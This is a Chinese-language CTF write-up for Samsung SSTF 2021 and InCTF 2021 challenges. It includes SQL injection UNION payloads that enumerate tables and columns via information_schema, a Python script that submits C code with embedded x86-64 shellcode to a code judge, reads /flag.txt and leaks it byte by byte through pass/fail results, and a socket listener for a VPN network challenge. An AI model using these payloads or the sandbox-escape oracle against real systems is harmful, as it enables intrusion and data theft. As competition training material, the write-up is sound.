最近没什么时间,只摸鱼打了两场比赛

Samsung Security Tech Forum 2021

sqli101

Mission: login as an admin using SQL Injection

Hint - SQL query

select id from users where id='{$_GET["id"]}' and pw='{$_GET["pw"]}'

要求和提示给得很明显,简单测试一下发现过滤了 or

联合注入 payload:

?id=a&pw=a'/**/union/**/select/**/'admin

sqli1

sqli102

一个根据关键词查询的功能,给了 hint

<?php
// Step 1 of the SQLi 102 challenge: a book-search page.
//   ?showsrc=<truthy>  -> print this file's source and stop
//   ?searchkey=<text>  -> run a LIKE query against `books` and render the matches below
include "./config.php";
$succ = -1;   // -1: no search submitted yet; 0: a search was run (drives the footer branch)
if($_GET['showsrc']) {
    show_source("step1.php");
    die;
}
if($_GET['searchkey']) {
    $succ = 0;
    // NOTE(review): the raw request parameter is concatenated into the SQL text with no
    // escaping and no parameter binding. A quote inside searchkey terminates the LIKE
    // pattern and the remainder of the input is executed as SQL -- this is the
    // challenge's intended bug.
    $query = "select * from books where title like '%".$_GET['searchkey']."%'";
    $db = dbconnect("sqli102_step3");   // defined in config.php (not shown here)
    $result = mysqli_query($db,$query);
    mysqli_close($db);                   // rows are still fetched from $result further down
    if($result) {
        $rows = mysqli_num_rows($result);
    }
}
// NOTE(review): $rows is assigned only when the query succeeded; the `if ($rows > 0)`
// below reads it unset otherwise (null, which is not greater than 0, so one of the
// two fallback branches is rendered).

?>

<!-- source: https://colorlib.com/wp/template/colorlib-search-23/ -->
<html>
    <head>
        <title>SQLi 102: Step 1</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="author" content="colorlib.com">
        <style id="" media="all">/* devanagari */
        @font-face {
          font-family: 'Poppins';
          font-style: normal;
          font-weight: 400;
          src: url(/fonts.gstatic.com/s/poppins/v15/pxiEyp8kv8JHgFVrJJbecmNE.woff2) format('woff2');
          unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB;
        }
        </style>
        <link href="style.css" rel="stylesheet" />
    </head>
    <body>
        <div class="s130">
            <form>
                <table border="0">
                    <tr>
                        <td style="font-size: 28px; text-align: left"><strong>A book search service</strong></td>
                        <td style="text-align: right; vertical-align: bottom"><a href="?showsrc=True">[HINT]</a></td>
                    </tr>
                </table>
                <div class="inner-form">
                    <div class="input-field first-wrap">
                        <div class="svg-wrapper">
                            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                                <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path>
                            </svg>
                        </div>
                        <input id="search" type="text" name="searchkey" placeholder="Enter keyword here" />
                    </div>
                    <div class="input-field second-wrap">
                        <button class="btn-search" type="submit">SEARCH</button>
                    </div>
                </div>

<?
    // Result table: rendered only when the query returned at least one row.
    if ($rows > 0) {
?>
                <br>
                <h2>Search Result</h2>
                <table>
                    <thead>
                        <tr>
                            <th width="10%">#</th>
                            <th width="50%">Title</th>
                            <th width="30%">Author</th>
                            <th width="10%">Price</th>
                        </tr>
                    </thead>
                    <tbody>

<?
    // NOTE(review): title/author/price are echoed without htmlspecialchars(). Through the
    // injection above a UNION payload chooses these values outright, so this is also an
    // unescaped-output (XSS) sink, not just a data-disclosure one.
    for($idx = 1; $idx <= $rows; $idx++) {
        $row = mysqli_fetch_assoc($result);
        echo "<tr><th scope=\"row\">".$idx."</th>";
        echo "<td>".$row["title"]."</td>";
        echo "<td>".$row["author"]."</td>";
        echo "<td>".$row["price"]."</td></tr>";
    }
?>
                    </tbody>
                </table>
<?
    // A search ran ($succ was set to 0) but matched nothing.
    } else if ($succ === 0) {
?>
                <br>
                <h2>Sorry, no results for your request.</h2>
<?
    // No search submitted: show the challenge prompt.
    } else {
?>
                <br>
                <h2 style="padding-left:30px">Quiz#1: How many columns are in the `<strong>count_me</strong>` table?</h2>
<?
    }
?>

            </form>
        </div>
    </body>
</html>

主要看关键代码

    // Injection point: the request parameter lands inside the LIKE pattern unescaped, so a
    // quote ends the pattern and everything after it is parsed as SQL.
    $query = "select * from books where title like '%".$_GET['searchkey']."%'";

SQL 的模糊匹配,先测试字段数,为 8 时有回显

xxxxxxxxxxxxx%' union select * from books order by 8#

image-20210817132712125

于是用联合注入获取表名

xxxxxxxxxxxxx%' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8#

image-20210817132904347

看到 findme 表,获取列名,拿到 flag

xxxxxxxxxxxxx%' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='findme'),3,4,5,6,7,8#

sqli2-2

SW Expert Academy

Are you poor at algorithm coding? Here is amazing platform to enhance your coding skill!

题目要求

image-20210817133926294

按要求搓了一段简陋的代码

#include<stdio.h>
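/* Win-rate task from SW Expert Academy: read six values for side A and six
 * for side B, count the (i, j) pairs with a[i] > b[j] out of the 36 possible,
 * and print that count over 36 as a reduced fraction ("%d/%d", no newline). */

/* Euclid's gcd.  gcd(0, n) == n, so a zero win count prints as "0/1". */
static int gcd(int m, int n)
{
    while (n != 0) {
        int r = m % n;
        m = n;
        n = r;
    }
    return m;
}

int main(void)
{
    enum { HAND = 6, PAIRS = HAND * HAND };
    int a[HAND], b[HAND];

    /* Stop on malformed input rather than comparing uninitialised values. */
    for (int i = 0; i < HAND; i++) {
        if (scanf("%d", &a[i]) != 1) {
            return 1;
        }
    }
    for (int i = 0; i < HAND; i++) {
        if (scanf("%d", &b[i]) != 1) {
            return 1;
        }
    }

    /* Plain nested loops.  The single-loop form this replaces re-entered its
     * body with j == 6 and read b[6] -- one past the end of the array -- on
     * every row before resetting j. */
    int win = 0;
    for (int i = 0; i < HAND; i++) {
        for (int j = 0; j < HAND; j++) {
            if (a[i] > b[j]) {
                win++;
            }
        }
    }

    int g = gcd(win, PAIRS);
    printf("%d/%d", win / g, PAIRS / g);
    return 0;
}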

通过三个测试案例后会返回三个 True,然后由前端弹窗提示通过了几个测试点。

发现通过了也没用,然后在 F12 里看到

<!-- Flag is placed at /flag.txt in executor instance. -->
<input type="hidden" name="sample_answer_code" value="aW50IGFbMTJdO2ZvcihpbnQgaT0wO2k8MTI7aSsrKXNjYW5mKCIlZCIsYStpKTtpbnQgYW5zPTA7aW50IG1vZD0zNjtmb3IoaW50IGk9MDtpPDY7aSsrKWZvcihpbnQgaj02O2o8MTI7aisrKWlmKGFbaV0+YVtqXSlhbnMrKztmb3IoaW50IGk9MjtpPDM2O2krKyl3aGlsZShhbnM+PWkmJmFucyVpPT0wJiZtb2QlaT09MClhbnMvPWksbW9kLz1pO3ByaW50ZigiJWQvJWQiLGFucyxtb2QpOw==">

base64 解码之后拿到代码

/* Reference solution as decoded from the hidden sample_answer_code field: a
 * bare statement fragment (no main()), reading all twelve values into one
 * array -- the first six are side A, the last six side B. */
int a[12];
for (int i = 0; i < 12; i++)
    scanf("%d", a + i);
int ans = 0;
int mod = 36;
/* Count (first half, second half) pairs where the first value is larger. */
for (int i = 0; i < 6; i++)
    for (int j = 6; j < 12; j++)
        if (a[i] > a[j])
            ans++;
/* Divide out common factors 2..35.  ans == 0 never satisfies ans >= i, so a
 * zero count is printed as 0/36 rather than 0/1. */
for (int i = 2; i < 36; i++)
    while (ans >= i && ans % i == 0 && mod % i == 0)
        ans /= i, mod /= i;
printf("%d/%d", ans, mod);

?????

知道了文件路径,尝试用 fopen 读文件然后按位比较爆破,但 open 被过滤了,利用 system 反弹 shell 也被过滤了。不过思路没问题:读文件,比较,根据返回值判断。

我写了几行软弱无力的 requests,然后 Pandaos 大哥写了 shellcode 来读取文件进行爆破。

import requests
import string
url='http://swexpertacademy.sstf.site/code'  # submission endpoint of the challenge's code judge
def req(payload):
    """POST ``payload`` as the ``code`` form field to ``url`` and return the body text.

    Keeps re-sending until a response whose ``.text`` is not None arrives.
    ``requests`` always supplies a ``str`` body, so in practice this is a
    single request with no retry on network errors (those propagate).
    """
    form = {'code': payload}
    body = None
    while body is None:
        body = requests.post(url, data=form).text
    return body


def test_one(pos: int, ch: str) -> str:
    """Send one probe for ``buffer[pos] == ch`` to the judge and return the raw body.

    The probe is a C fragment that the judge apparently splices into its own
    main(): it declares ``myfunc``, calls it, closes that enclosing function,
    then appends a byte array placed in .text (per the write-up, machine code
    that reads /flag.txt into ``buffer``) and ``myfunc`` itself.  The reference
    solution is compiled in only when ``buffer[pos] == ch``, so whether the
    judge's verdict contains 'true' leaks one byte-comparison per request --
    the oracle the loop below drives.

    Only ``%d`` (pos) and ``%s`` (ch) are substituted; the ``%%`` sequences are
    literal percent signs for the embedded C.  ``ch`` is pasted into a C char
    literal unquoted, so a quote, backslash or whitespace character would
    break the probe instead of testing it.
    """
    code = """int myfunc();
    myfunc();
  return 0;
}
__attribute__((section(".text")))
const unsigned char code[] = {
    0x55,0x48,0x89,0xe5,0x48,0x83,0xec,0x50,0x6a,0x74,0x48,0xb8,0x2f,0x66,0x6c,0x61,0x67,0x2e,0x74,0x78,0x50,0x48,0x89,0x7c,0x24,0x20,0x48,0x89,0xe7,0x31,0xd2,0x31,0xf6,0x6a,0x2,0x58,0xf,0x5,0x48,0x89,0xc7,0x31,0xc0,0x6a,0x40,0x5a,0x48,0x8b,0x74,0x24,0x20,0xf,0x5,0x48,0x89,0xec,0x5d,0xc3
};

int myfunc() {
    char buffer[100];
    int pos = %d;
    (*(void(*)(char *)) code)(buffer);
    if(buffer[pos] == '%s') {
        int a[12];for(int i=0;i<12;i++)scanf("%%d",a+i);int ans=0;int mod=36;for(int i=0;i<6;i++)for(int j=6;j<12;j++)if(a[i]>a[j])ans++;for(int i=2;i<36;i++)while(ans>=i&&ans%%i==0&&mod%%i==0)ans/=i,mod/=i;printf("%%d/%%d",ans,mod);
    }
""" % (pos, ch)
    return req(code)

# Recover the file one position at a time: for each of the first 60 offsets try
# every printable character and keep the first one the judge answers 'true' to.
# An offset with no match leaves flag unchanged and moves on.
flag = ''
for pos in range(60):
    candidates = (c for c in string.printable if 'true' in test_one(pos, c))
    hit = next(candidates, None)
    if hit is not None:
        flag += hit
        print(flag)

本地挂代理跑得也慢,就丢到服务器上跑

image-20210817134946288

Inctf 2021

Listen

一道 network 题,给了一个 ovpn 文件,用 openvpn 连接后可以看到,连接到了 34.87.108.160 并且不断接收到数据

image-20210817135313498

但是抓包一直没抓到 flag

解法是直接操作原生 socket

由于菜,还没学 socket,脚本是队友写的。自己添加了一些判断,顺便学了一点点 socket 相关的知识,脚本如下

import socket
import re
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4/TCP listener; bound in listen()
start = 'inctf'  # flag prefix; listen() builds its regex as start + "(.+)" + end
end = '}'        # flag terminator
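def listen():
    """Accept one TCP client on ``skt`` and print any flag-shaped text it sends.

    Binds to 172.30.0.14:31337 (presumably this host's address on the
    challenge VPN -- confirm against the ovpn config), accepts a single
    connection and reads up to four 2048-byte chunks from it.  Each chunk is
    searched for ``start(.+)end``; the first hit per chunk is printed.

    The accepted connection is closed when the function returns.  Bytes that
    are not valid UTF-8 are replaced rather than aborting the scan, since the
    peer's encoding is not under our control.  ``skt`` itself is module-level
    and is left open.
    """
    skt.bind(('172.30.0.14', 31337))
    skt.listen(1)
    conn, _peer = skt.accept()
    pattern = re.compile(start + "(.+)" + end)
    with conn:
        for _ in range(4):
            chunk = conn.recv(2048).decode(errors='replace')
            found = pattern.findall(chunk)
            if found:
                print(start + found[0] + end)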
    
listen()  # one-shot: bind, accept a single peer, scan four reads, exit

image-20210817135625800
